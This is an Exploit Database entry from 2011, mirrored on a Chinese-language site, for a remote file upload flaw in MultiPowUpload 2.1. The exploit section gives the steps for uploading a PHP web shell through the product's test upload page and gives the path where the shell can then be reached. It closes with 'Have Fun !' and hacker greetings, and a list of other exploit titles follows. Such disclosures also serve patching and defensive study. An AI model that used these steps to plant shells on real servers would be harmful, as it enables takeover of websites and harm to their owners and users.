MultiPowUpload 2.1 – Arbitrary File Upload

Exploit Database
6 阅读

作者： DIES3L

日期： 2011-01-26
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/16058/

[#] Exploit Title:MultiPowUpload v 2.1 Remote File Upload Vulnerability
[#] Author: DIES3L
[#] Email: zxn@Hotmail.Com
[#] Date: 26-1-2011
[#] Software Link: http://www.element-it.com
[#] Download Software : http://www.element-it.com/Download/ElementIT.MultiPowUpload3.zip
[#] Version: 2.1
[#] Tested on: LiNuX

======================

[-- Exploit --]
http://localhost/[path]/uploadtest.html

+ Click Browse Then Chose Your File [SHELL.php]
+ Your Shell Here :
http://localhost/[path]/FileProcessingScripts/PHP/UploadedFiles/[SHELL.php]

Have Fun !
======================

[-- Greetz To --]
ALL H4ck4rs FroM s4uD1 Ar4b!a ..

======================

last Exploits
MultiPowUpload 2.1 – Arbitrary File Upload的更多信息

Joomla! Component com_PHP 0.1 – Local File Inclusion：
WordPress Plugin RobotCPA V5 – Local File Inclusion：
TinyMCPUK – ‘test’ Cross-Site Scripting：
vBShout – Persistent Cross-Site Scripting：
Complaint Management System 1.0 – ‘username’ SQL Injection：
Xerox DocuShare – SQL Injection：
Online Work Order Suite – Login SQL Injection：
Itech Multi Vendor Script 6.49 – ‘pl’ SQL Injection：